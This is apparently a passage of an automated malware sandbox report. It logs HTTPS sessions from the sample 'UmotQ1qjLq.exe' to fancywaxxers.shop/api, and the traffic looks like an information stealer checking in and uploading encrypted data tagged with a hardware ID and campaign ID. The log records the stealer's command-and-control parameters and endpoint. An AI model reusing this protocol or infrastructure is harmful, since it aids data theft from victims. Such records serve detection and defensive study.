Dec 30, 2024 15:53:34.272211075 CET	1236	IN	Data Raw: a1 60 d0 fd 99 6a eb f6 a2 60 e0 13 97 60 da fa 9c 58 8c 07 99 63 e2 fd 96 56 eb 05 a9 56 de 0d b3 54 db 02 9a 5a d3 b4 a6 54 eb 01 95 5f cd fb 98 63 eb 00 a3 54 d7 b4 a6 56 de 0a 9d 54 d1 13 99 63 de 03 a6 70 cf 06 9d 65 d5 f7 94 5d 8c 07 99 63 Data Ascii: `j``XcVVTZT_cTVTcpe]cVc_RVTdU_TcTdZTcTdUgpacVcpgTdZWpeUVVTTdcV]

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	104.21.96.1	443	6256	C:\Users\user\Desktop\UmotQ1qjLq.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 14:52:59 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: fancywaxxers.shop
2024-12-30 14:52:59 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-30 14:53:19 UTC	1129	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 14:53:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=n94ckl685u6v25b9mp68uhrqii; expires=Fri, 25 Apr 2025 08:39:58 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jN%2B5Z8Uum6Wn%2BuK2gdzt630MCnCrKEbABEOXbEavtY4BN8oBWRKiuXIXh5FFEn2X1ainDxFaNHvFSigqoXF0v4DXEMKNUryoLywzgQt5Sd9fsZ1qZqJ4XwDIeMCW86DIb5J0SQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa2db594912de9a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1687&min_rtt=1681&rtt_var=634&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=908&delivery_rate=1737061&cwnd=209&unsent_bytes=0&cid=c90efb43423b3f34&ts=20117&x=0"
2024-12-30 14:53:19 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-30 14:53:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	104.21.96.1	443	6256	C:\Users\user\Desktop\UmotQ1qjLq.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 14:53:20 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 53 Host: fancywaxxers.shop
2024-12-30 14:53:20 UTC	53	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
2024-12-30 14:53:20 UTC	1133	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 14:53:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=epo7fpccmcl65bhnq7ku6usn56; expires=Fri, 25 Apr 2025 08:39:59 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kCWKd0x%2FbtWfqsz3Chr1zr82K0PBjGFJOSjbMmMjDbQbExjmQQbx%2BTou5a1lP8IDiKFzlEkp%2FvGThJMdBUra2xM47ZEhmZom%2FwCEv2q83g3fW04ZdSDaXOl4%2FvI3qMroWuRQUw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa2dbda69031a48-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1950&min_rtt=1939&rtt_var=750&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=954&delivery_rate=1437715&cwnd=157&unsent_bytes=0&cid=9ad02f56aabe00ac&ts=470&x=0"
2024-12-30 14:53:20 UTC	236	IN	Data Raw: 31 63 61 33 0d 0a 34 50 51 53 65 36 77 65 30 54 6f 69 6a 47 79 34 65 6f 73 39 65 43 77 39 36 39 70 6b 56 62 30 2b 75 4d 59 32 38 75 57 6c 33 4a 75 62 31 6d 52 5a 6c 69 72 39 47 46 48 70 54 6f 49 4f 2b 55 67 64 41 42 2b 4b 76 6b 5a 76 32 31 2f 55 74 56 50 65 78 39 4f 78 75 64 71 53 63 78 66 66 65 2f 30 59 52 2f 52 4f 67 69 48 77 48 78 31 43 48 39 48 34 41 54 2f 66 58 39 53 6b 56 35 6d 4b 31 62 44 34 69 4a 68 31 45 38 6c 39 74 56 74 4f 34 51 6e 64 48 2b 70 58 46 6b 56 51 67 37 64 47 65 5a 39 62 77 75 51 4d 30 4b 6a 41 71 50 71 74 6c 57 45 51 6a 6d 50 39 51 51 44 70 41 70 70 41 71 56 77 64 54 6c 47 4e 76 67 38 39 31 56 62 63 70 56 4b 59 6c 63 79 36 38 34 69 57 64 68 4c 44 64 4b 46 57 52 4f 59 43 32 78 Data Ascii: 1ca34PQSe6we0ToijGy4eos9eCw969pkVb0+uMY28uWl3Jub1mRZlir9GFHpToIO+UgdAB+KvkZv21/UtVPex9OxudqScxffe/0YR/ROgiHwHx1CH9H4AT/fX9SkV5mK1bD4iJh1E8l9tVtO4QndH+pXFkVQg7dGeZ9bwuQM0KjAqPqtlWEQjmP9QQDpAppAqVwdTlGNvg891VbcpVKYlcy684iWdhLDdKFWROYC2x
2024-12-30 14:53:20 UTC	1369	IN	Data Raw: 58 71 48 31 51 4f 57 4a 48 34 58 6e 65 4d 62 74 6d 31 52 59 57 4b 31 37 69 35 6e 64 68 70 57 63 6c 77 38 77 41 41 35 67 4c 55 48 65 70 51 48 55 39 66 6d 37 63 47 4e 4e 64 55 33 71 35 62 6e 34 6a 4a 74 50 36 4b 6e 33 63 57 79 58 53 31 56 30 4f 75 51 4a 6f 66 38 52 39 43 44 6e 2b 5a 75 77 55 6a 30 6b 32 61 75 78 71 4a 78 38 43 79 75 64 72 57 64 68 66 50 63 62 4e 4b 53 4f 55 46 33 77 72 69 56 68 64 44 58 34 53 79 43 54 54 66 57 39 43 75 57 35 71 44 79 72 50 2f 67 70 59 77 56 34 35 37 71 78 67 59 72 69 33 66 43 4f 35 54 44 41 78 6c 79 61 64 49 4c 70 39 62 31 75 51 4d 30 49 2f 43 76 66 71 4a 6d 58 4d 52 78 57 36 7a 53 6b 62 6a 43 38 67 65 37 46 45 51 54 55 32 44 74 67 41 30 31 6c 66 54 6f 56 4f 55 78 34 6e 2b 2f 70 72 57 4b 46 6e 76 63 62 68 55 53 76 6b 4f 6d Data Ascii: XqH1QOWJH4XneMbtm1RYWK17i5ndhpWclw8wAA5gLUHepQHU9fm7cGNNdU3q5bn4jJtP6Kn3cWyXS1V0OuQJof8R9CDn+ZuwUj0k2auxqJx8CyudrWdhfPcbNKSOUF3wriVhdDX4SyCTTfW9CuW5qDyrP/gpYwV457qxgYri3fCO5TDAxlyadILp9b1uQM0I/CvfqJmXMRxW6zSkbjC8ge7FEQTU2DtgA01lfToVOUx4n+/prWKFnvcbhUSvkOm
2024-12-30 14:53:20 UTC	1369	IN	Data Raw: 61 51 6b 32 46 73 67 41 34 30 6c 43 61 36 68 53 58 6e 34 66 6d 75 61 69 56 5a 42 72 45 50 6f 5a 62 54 75 41 4a 7a 46 6a 32 45 51 4d 4f 57 49 58 34 58 6e 66 53 58 64 4b 69 52 70 2b 4b 78 4c 44 33 6a 5a 4e 2f 45 63 35 38 76 6c 31 45 35 51 58 5a 46 65 31 4e 45 45 35 58 6a 4c 6b 4d 50 5a 38 53 6d 71 4e 4d 30 4e 2b 48 6a 2b 36 4a 31 45 55 61 77 48 4b 30 54 67 44 78 51 4d 4e 59 37 6c 4e 61 46 68 2b 45 73 41 4d 79 30 46 33 51 71 6c 47 61 69 38 2b 77 2b 70 43 5a 64 42 6e 43 64 4c 6c 56 54 75 6f 47 30 78 50 69 57 52 70 50 56 63 6e 32 52 6a 44 48 48 49 4c 6b 59 4a 65 4c 79 72 47 37 74 35 56 2b 46 38 6c 71 38 30 63 4f 39 30 37 64 46 4b 6b 48 57 6b 4a 57 69 62 4d 4d 4d 39 39 62 31 36 46 58 6c 34 54 4b 75 66 4f 4d 6b 58 51 56 78 33 47 31 57 45 66 71 43 38 67 64 34 46 Data Ascii: aQk2FsgA40lCa6hSXn4fmuaiVZBrEPoZbTuAJzFj2EQMOWIX4XnfSXdKiRp+KxLD3jZN/Ec58vl1E5QXZFe1NEE5XjLkMPZ8SmqNM0N+Hj+6J1EUawHK0TgDxQMNY7lNaFh+EsAMy0F3QqlGai8+w+pCZdBnCdLlVTuoG0xPiWRpPVcn2RjDHHILkYJeLyrG7t5V+F8lq80cO907dFKkHWkJWibMMM99b16FXl4TKufOMkXQVx3G1WEfqC8gd4F
2024-12-30 14:53:20 UTC	1369	IN	Data Raw: 68 36 35 47 4b 4a 46 46 6d 71 4e 59 30 4e 2b 48 74 2f 43 51 6d 48 34 51 77 33 71 37 58 30 37 6a 42 64 77 54 37 6c 67 63 51 31 65 45 76 51 55 32 32 31 62 49 70 31 2b 61 69 73 33 2b 74 38 4b 52 61 46 6d 57 50 4a 52 55 61 66 34 56 79 41 36 70 51 46 52 58 48 34 36 30 52 6d 2b 66 58 39 57 74 57 35 69 50 79 4c 48 39 6a 4a 42 32 46 4d 74 7a 75 55 70 49 34 41 50 52 46 2b 4a 4e 47 6b 4e 62 68 62 77 4f 50 4e 55 63 6c 4f 52 54 69 4d 65 66 2f 73 79 50 6d 58 41 61 32 44 79 73 46 6c 6d 75 43 64 5a 59 73 52 38 57 51 46 2b 47 74 41 6f 38 31 31 33 57 71 6c 4f 56 6a 73 2b 32 36 34 4f 53 65 42 6a 41 63 37 4a 63 52 65 73 4b 33 52 7a 76 55 46 6f 41 48 34 36 67 52 6d 2b 66 63 2f 32 52 46 72 47 39 68 36 47 33 6d 39 5a 33 46 59 34 6b 38 31 52 44 34 67 62 56 48 75 42 54 45 45 64 Data Ascii: h65GKJFFmqNY0N+Ht/CQmH4Qw3q7X07jBdwT7lgcQ1eEvQU221bIp1+ais3+t8KRaFmWPJRUaf4VyA6pQFRXH460Rm+fX9WtW5iPyLH9jJB2FMtzuUpI4APRF+JNGkNbhbwOPNUclORTiMef/syPmXAa2DysFlmuCdZYsR8WQF+GtAo8113WqlOVjs+264OSeBjAc7JcResK3RzvUFoAH46gRm+fc/2RFrG9h6G3m9Z3FY4k81RD4gbVHuBTEEd
2024-12-30 14:53:20 UTC	1369	IN	Data Raw: 54 50 63 57 4e 2b 72 56 5a 47 42 31 62 6e 77 6b 4a 68 39 46 73 5a 30 75 6c 6c 45 36 77 50 63 46 4f 4e 65 48 55 42 52 67 66 68 49 64 39 68 45 6d 76 77 55 73 5a 66 63 72 4f 2b 50 74 33 30 57 6a 6d 50 39 51 51 44 70 41 70 70 41 71 56 59 49 53 6c 4b 62 73 51 45 35 30 46 2f 49 70 56 6d 62 6c 63 43 78 2f 59 57 61 64 68 62 49 66 62 5a 53 54 4f 6b 4c 30 52 66 6c 48 31 51 4f 57 4a 48 34 58 6e 66 78 56 38 6d 7a 56 35 36 4d 30 61 57 35 6e 64 68 70 57 63 6c 77 38 77 41 41 37 51 58 52 48 4f 6c 54 47 6b 70 53 69 61 6f 4a 4d 4e 68 56 30 62 5a 65 6c 34 44 4d 74 76 4b 4e 6b 47 49 56 77 47 36 32 53 6c 4b 75 51 4a 6f 66 38 52 39 43 44 6d 6d 4f 71 42 59 30 6e 57 33 4d 70 30 4b 62 69 73 76 2b 35 73 79 50 4d 42 37 43 50 4f 73 59 52 75 45 48 32 52 66 6f 56 68 5a 44 57 6f 43 39 Data Ascii: TPcWN+rVZGB1bnwkJh9FsZ0ullE6wPcFONeHUBRgfhId9hEmvwUsZfcrO+Pt30WjmP9QQDpAppAqVYISlKbsQE50F/IpVmblcCx/YWadhbIfbZSTOkL0RflH1QOWJH4XnfxV8mzV56M0aW5ndhpWclw8wAA7QXRHOlTGkpSiaoJMNhV0bZel4DMtvKNkGIVwG62SlKuQJof8R9CDmmOqBY0nW3Mp0Kbisv+5syPMB7CPOsYRuEH2RfoVhZDWoC9
2024-12-30 14:53:20 UTC	1369	IN	Data Raw: 66 55 6c 6c 65 4c 78 39 6a 77 34 4d 4b 52 66 46 6d 57 50 4c 42 66 51 2b 38 45 30 78 54 6d 57 42 35 63 56 59 36 71 42 7a 62 55 55 64 61 6b 57 5a 32 4e 78 72 66 30 6a 70 74 33 48 73 46 35 38 78 59 41 36 52 61 61 51 4b 6c 2b 46 30 56 54 30 75 4a 47 4b 4a 46 46 6d 71 4e 59 30 4e 2b 48 76 76 4f 48 6e 48 30 61 77 58 2b 68 57 55 62 38 44 74 63 53 2b 31 55 52 53 31 4b 45 74 51 55 78 32 56 66 57 74 6c 32 51 68 4d 7a 2b 74 38 4b 52 61 46 6d 57 50 4a 42 50 56 75 51 4a 31 67 37 69 58 68 6c 59 55 70 6e 34 53 48 66 4f 57 38 76 6b 44 49 61 58 30 4c 6e 6d 7a 49 38 77 48 73 49 38 36 78 68 47 35 77 6a 64 48 75 64 4e 48 30 68 51 68 72 45 50 4d 39 64 66 32 71 42 51 6c 34 4c 45 73 76 4b 46 6c 58 38 64 78 33 4b 36 56 77 43 67 54 74 30 41 71 51 64 61 62 30 53 4b 74 41 74 33 77 Data Ascii: fUlleLx9jw4MKRfFmWPLBfQ+8E0xTmWB5cVY6qBzbUUdakWZ2Nxrf0jpt3HsF58xYA6RaaQKl+F0VT0uJGKJFFmqNY0N+HvvOHnH0awX+hWUb8DtcS+1URS1KEtQUx2VfWtl2QhMz+t8KRaFmWPJBPVuQJ1g7iXhlYUpn4SHfOW8vkDIaX0LnmzI8wHsI86xhG5wjdHudNH0hQhrEPM9df2qBQl4LEsvKFlX8dx3K6VwCgTt0AqQdab0SKtAt3w
2024-12-30 14:53:20 UTC	258	IN	Data Raw: 55 33 73 66 41 70 72 6e 61 31 6c 41 53 32 48 6d 30 54 67 4c 62 44 64 51 57 37 6b 6c 61 55 57 44 48 2b 41 6b 74 6e 77 54 6a 76 52 53 58 69 34 66 6d 75 5a 65 52 63 42 37 55 61 72 52 55 55 65 55 44 31 6a 72 6d 57 41 78 4e 55 49 71 70 44 33 76 55 55 5a 72 71 46 4a 65 66 68 2b 61 35 72 5a 46 6d 47 75 46 2f 6f 6c 45 41 6f 45 37 64 44 71 6b 48 57 6e 41 66 6d 37 73 57 4e 4e 42 4e 35 4f 51 4d 69 62 6d 48 74 65 2b 46 68 6e 4d 50 78 58 47 2f 53 58 36 75 56 6f 35 4b 75 77 31 49 48 45 44 4a 70 7a 6c 35 6e 31 32 61 2f 47 32 4a 78 39 48 2b 6f 64 44 59 4d 41 75 4f 4a 50 4d 66 51 2f 77 63 33 42 76 2f 58 46 31 77 59 61 36 75 44 44 44 50 57 38 32 72 46 4e 37 48 79 50 36 68 75 39 5a 35 48 74 56 74 70 56 56 51 36 55 37 6c 56 71 6c 48 57 68 59 66 76 4c 73 49 4f 64 68 4b 79 2b Data Ascii: U3sfAprna1lAS2Hm0TgLbDdQW7klaUWDH+AktnwTjvRSXi4fmuZeRcB7UarRUUeUD1jrmWAxNUIqpD3vUUZrqFJefh+a5rZFmGuF/olEAoE7dDqkHWnAfm7sWNNBN5OQMibmHte+FhnMPxXG/SX6uVo5Kuw1IHEDJpzl5n12a/G2Jx9H+odDYMAuOJPMfQ/wc3Bv/XF1wYa6uDDDPW82rFN7HyP6hu9Z5HtVtpVVQ6U7lVqlHWhYfvLsIOdhKy+
2024-12-30 14:53:20 UTC	1369	IN	Data Raw: 32 63 66 31 0d 0a 7a 68 6f 33 41 72 76 36 56 6d 54 42 58 6a 6e 72 7a 41 42 4f 67 54 74 34 4a 71 51 64 4b 48 41 54 63 36 31 46 6e 6a 55 4f 55 76 52 53 47 78 35 2f 73 74 38 4b 45 4d 45 47 4f 4f 37 42 4b 55 75 67 4e 7a 42 75 75 59 53 52 70 52 59 53 2b 45 53 62 68 59 74 32 2b 57 5a 61 51 31 76 4c 73 67 5a 68 2b 48 74 67 38 2f 52 68 50 72 6c 62 6a 57 4b 45 66 4a 51 41 66 6b 66 68 65 64 2b 70 66 31 4b 70 54 68 70 61 4b 6d 65 4f 50 6b 47 63 49 6a 6a 4c 7a 58 67 43 32 58 4a 52 59 37 55 35 61 46 67 2f 62 34 31 4e 6b 69 41 79 49 75 78 71 4a 78 39 48 2b 6f 64 44 59 4d 41 75 4f 4a 50 4d 66 51 2f 77 63 33 42 76 2f 58 46 31 77 59 61 65 2f 41 44 4c 59 54 4a 69 4b 58 34 53 41 68 2f 43 35 6a 64 59 6f 49 49 34 30 38 32 63 4f 72 68 61 61 51 4b 6c 71 47 55 42 52 6a 71 34 58 Data Ascii: 2cf1zho3Arv6VmTBXjnrzABOgTt4JqQdKHATc61FnjUOUvRSGx5/st8KEMEGOO7BKUugNzBuuYSRpRYS+ESbhYt2+WZaQ1vLsgZh+Htg8/RhPrlbjWKEfJQAfkfhed+pf1KpThpaKmeOPkGcIjjLzXgC2XJRY7U5aFg/b41NkiAyIuxqJx9H+odDYMAuOJPMfQ/wc3Bv/XF1wYae/ADLYTJiKX4SAh/C5jdYoII4082cOrhaaQKlqGUBRjq4X
2024-12-30 14:53:20 UTC	1369	IN	Data Raw: 7a 6b 44 4d 4c 4a 68 36 79 35 32 74 59 33 47 74 78 75 74 56 74 57 37 55 6e 6b 4a 73 35 52 48 55 39 4a 6d 61 38 4a 43 65 46 4a 32 61 70 61 6c 35 48 57 2f 72 66 43 6d 54 42 42 39 7a 7a 37 47 48 2b 67 54 73 4a 59 73 52 38 76 54 56 47 48 76 78 41 6d 6b 6e 76 55 6f 31 57 47 6c 39 43 78 75 63 7a 57 64 6c 6d 57 4c 76 30 59 52 50 39 4f 67 6b 69 37 42 45 38 64 43 4e 6e 71 47 58 6e 47 48 4d 7a 6b 44 4d 4c 4a 68 36 79 35 32 74 59 33 47 74 78 75 74 56 74 57 37 55 6e 6b 4a 73 35 52 48 55 39 4a 6d 61 38 4a 65 50 46 71 2b 35 70 71 68 59 54 4a 73 50 36 55 68 7a 42 58 6a 6e 50 7a 41 48 6d 75 52 70 6f 6e 70 78 38 43 44 67 66 4a 6a 51 55 35 30 56 76 4d 74 52 6d 33 69 63 43 2f 37 35 4b 42 66 31 62 67 53 70 49 59 44 71 34 49 6d 6b 43 37 45 56 70 4b 54 73 6e 67 56 6d 57 45 43 Data Ascii: zkDMLJh6y52tY3GtxutVtW7UnkJs5RHU9Jma8JCeFJ2apal5HW/rfCmTBB9zz7GH+gTsJYsR8vTVGHvxAmknvUo1WGl9CxuczWdlmWLv0YRP9Ogki7BE8dCNnqGXnGHMzkDMLJh6y52tY3GtxutVtW7UnkJs5RHU9Jma8JePFq+5pqhYTJsP6UhzBXjnPzAHmuRponpx8CDgfJjQU50VvMtRm3icC/75KBf1bgSpIYDq4ImkC7EVpKTsngVmWEC

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49738	104.21.96.1	443	6256	C:\Users\user\Desktop\UmotQ1qjLq.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 14:53:21 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=9NXE64WVLE11 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18133 Host: fancywaxxers.shop
2024-12-30 14:53:21 UTC	15331	OUT	Data Raw: 2d 2d 39 4e 58 45 36 34 57 56 4c 45 31 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 36 39 31 45 45 36 32 39 32 44 38 36 41 34 41 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 39 4e 58 45 36 34 57 56 4c 45 31 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 39 4e 58 45 36 34 57 56 4c 45 31 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 39 4e 58 45 36 34 57 56 Data Ascii: --9NXE64WVLE11Content-Disposition: form-data; name="hwid"4691EE6292D86A4A20A4C476FD51BCB1--9NXE64WVLE11Content-Disposition: form-data; name="pid"2--9NXE64WVLE11Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--9NXE64WV
2024-12-30 14:53:21 UTC	2802	OUT	Data Raw: cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d Data Ascii: u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECa
2024-12-30 14:53:22 UTC	1139	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 14:53:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=fssd6apvkjrsi67pmqgllb1976; expires=Fri, 25 Apr 2025 08:40:01 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yNxUMiqlZBzo%2B233FFl9tMxmOwJ3wyg0oQSB4vNjmB9DWH4aMk9%2FN%2B49gb0NwImqLFBfO8rdb9N7Z3Nme3qTkij1laOenff4H9%2BVMK4e1C%2FMHto%2FzR2dbC5e6UjmL3rDfL6rWQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa2dbe2fafec32e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1640&min_rtt=1630&rtt_var=632&sent=10&recv=23&lost=0&retrans=0&sent_bytes=2843&recv_bytes=19090&delivery_rate=1701631&cwnd=178&unsent_bytes=0&cid=86bdd37953fc8711&ts=743&x=0"
2024-12-30 14:53:22 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-30 14:53:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49739	104.21.96.1	443	6256	C:\Users\user\Desktop\UmotQ1qjLq.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 14:53:23 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=XEIZM4CKNDMC User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8754 Host: fancywaxxers.shop
2024-12-30 14:53:23 UTC	8754	OUT	Data Raw: 2d 2d 58 45 49 5a 4d 34 43 4b 4e 44 4d 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 36 39 31 45 45 36 32 39 32 44 38 36 41 34 41 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 58 45 49 5a 4d 34 43 4b 4e 44 4d 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 58 45 49 5a 4d 34 43 4b 4e 44 4d 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 58 45 49 5a 4d 34 43 4b Data Ascii: --XEIZM4CKNDMCContent-Disposition: form-data; name="hwid"4691EE6292D86A4A20A4C476FD51BCB1--XEIZM4CKNDMCContent-Disposition: form-data; name="pid"2--XEIZM4CKNDMCContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--XEIZM4CK
2024-12-30 14:53:23 UTC	1135	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 14:53:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=vri7gg9fqj14ptgmp81n23sduh; expires=Fri, 25 Apr 2025 08:40:02 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GnkbJl54%2FMx3LL7a%2BtSzWqI15J9zXq2hGupZpdHveiM2R3SF35mciG7lU7lWg422amZw1aXhQ%2B0CgK1hCxu8Igb855ahFh9Wuf%2F15xQDzxT8FWJbFFWeXJNWttexi%2Bj8pBmlrQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa2dbed5daa1a48-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2094&min_rtt=2038&rtt_var=805&sent=7&recv=13&lost=0&retrans=0&sent_bytes=2843&recv_bytes=9688&delivery_rate=1432777&cwnd=157&unsent_bytes=0&cid=b00b0308e4f71899&ts=584&x=0"
2024-12-30 14:53:23 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-30 14:53:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
